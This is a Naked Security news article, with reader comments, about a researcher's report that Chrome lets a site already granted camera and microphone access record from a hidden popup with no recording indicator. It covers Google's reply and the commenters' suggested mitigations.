Skip to content
Naked Security Naked Security

Chrome bug that lets sites secretly record you ‘not a flaw’, insists Google

Definitely not a security issue, says Google, as it moves to address flaw that could have you inadvertently starring in someone else's movie

Remember last year’s Google Chrome bug that gave pirates a way to steal streaming movies?

Well, we’re ready for our closeup, Mr DeMille! This time, we’re potentially the stars of hackers’ movies: there’s a Google Chrome “bug” (depending on who you ask) that allows sites to surreptitiously record audio and visual, all without an indicator light.

As BleepingComputer reports, AOL web developer Ran Bar-Zik discovered the issue – which Google says is not a security vulnerability – while at work, when he was dealing with a website that ran WebRTC code.

WebRTC is a protocol for streaming audio and video content over the internet in real time via peer-to-peer connections.

On the “this is not a security bug” side of the coin, a user first has to grant a site permission before it can access audio and video. After a site receives permission to stream audio and visual, it can run JavaScript code that records audio or video content before it sends the content to other participants of an WebRTC stream, as Bar-Zik’s bug report explains.

The thing is, the JavaScript doesn’t have to run in the same tab as where the permission was granted. It can record on a separate tab that doesn’t display the graphical red dot that indicates that WebRTC is recording. Thus, after permission is given, the site can listen to the user whenever it – or a hacker – wants to.

Th recording process is done via the JavaScript-based MediaRecorder API, according to BleepingComputer.

Bar-Zik reported the issue and heard back from Google on the same day. Its argument was that the red circle and dot recording icon aren’t present in all versions of Chrome, so the real way to defend against an attack would be in the permissions popup. Google’s take on it:

This isn’t really a security vulnerability – for example, WebRTC on a mobile device shows no indicator at all in the browser. The dot is a best-first effort that only works on desktop when we have chrome UI space available. That being said, we are looking at ways to improve this situation.

Bar-Zik doesn’t buy it. He says that it would be pretty easy to trick a victim who’s suffering from “I’m not reading another pop-up, I’ll just click OK” permissions fatigue.

“Real-world attacks aren’t going to be very obvious,” he told BleepingComputer. From the writeup:

For example, Bar-Zik argues that an attacker could use very small popups to launch the attack code. This code can use the camera for a millisecond to take a user’s picture, or for hours, recording the user’s movements or nearby audio.

If the user doesn’t notice the popup in his toolbar, there’s no visual indicator to cue him that someone is accessing his audio and video components. One of the sneakiest scenarios would be if the attacker disguised the popup as a mundane ad. If the user doesn’t immediately close the ad’s popup, an attacker remains with an surveillance channel opened on the user’s PC.

An attacker wouldn’t even have to create a website to steal the recording permission, he said. Rather, they could exploit a cross-site scripting (XSS) flaw – also known as one of the web attacks that refuse to die – on legitimate websites that have already been granted audio and video access.

Bug? Not bug? You can decide for yourself: Bar-Zik has put up a harmless demo that asks you for permission, launches a popup when you click OK, records 20 seconds of audio, and provides a download link for the recorded file.

The proof-of-concept code is also available for download here.


11 Comments

Is there a way to disable?

Yes. Either disconnect the camera/microphone or disable javascript.

Disabling javascript is a bit of a pain, as you have to individually authorize each site to use it, however it stops a lot of autoplay videos, animated ads and other shenanigans cold.

Indeed, I would like a “Don’t allow any site to record me ever, don’t bother even asking permission” setting.

Disable WebRTC which honestly from a security and privacy standpoint you should have disabled anyway as it leaks information such as your real IP address and location even when using a VPN.

Well, if it’s intended behavior it’s certainly not a bug. It is however very much a vulnerability. But I don’t think a recording indicator is a good mitigation. The way I see it the only real way to mitigate it is to make the permissions more finely grained and to limit the scope to which they apply.

Click the Chrome menu Chrome menu on the browser toolbar.
Select Settings.
Click Show advanced settings.
In the “Privacy” section, click Content settings.
In the “Media” section:
Ask when a site requires access to your camera and microphone: Select this option if you want Chrome to alert you whenever a site requests access to your camera and microphone.
Do not allow sites to access your camera and microphone: Select this option to automatically deny any site requests to access your camera and microphone.
Click Manage exceptions to remove previously-granted permissions for specific sites.

You can learn more here.

Google is correct, its not a bug. Users have to enable the permission for the site. The fact that they don’t pay attention to what permissions they’re granting isn’t googles fault. The only thing that is hidden is the indicator that its actually recording, but if you don’t allow it in the first place that’s not an issue.

It’s a flaw in how JavaScript does security — fundamentally. We complained about it when Microsoft tried to do it in 1998, and prevented it from becoming a standard. Just about everything in HTML5 — very nearly all of it — is stuff the security community, some of your employees at Sophos included, directly objected to when Microsoft tried to do it in 1998 to 2000.

The difference is there are enough users now that it doesn’t matter what security experts / people think about how safe something is (or isn’t). It’s going to happen and be pulled into JavaScript and HTML regardless, because Google can simultaneously drop any discussion about the negatives straight off of search, and get a handful of evangelists very excited about whatever technology to promote it.

At the end of the day, nearly 100% of what HTML5 added can be abused, and same site origin is getting to be a massive problem. Sites are pulling in scripts from dozens of CDN’s, and it’s all just a giant gaping security hole. All we can do is plug the worst of it, after it happens — and hope that it doesn’t take a disaster for Google to start listening.

I’ve considered this a problem for years, and I don’t consider it a problem with Chrome, anymore than I do for any other browser. It’s no more Google’s fault, then Microsoft, Apple or any other browser creatot.

I have a very simple way to disable the video recording. I have a custom-designed piece of cardboard placed over the video camera lens, hinged so I can move it out of the way when I actually want to record video.

Comments are closed.

Subscribe to get the latest updates in your inbox.
Which categories are you interested in?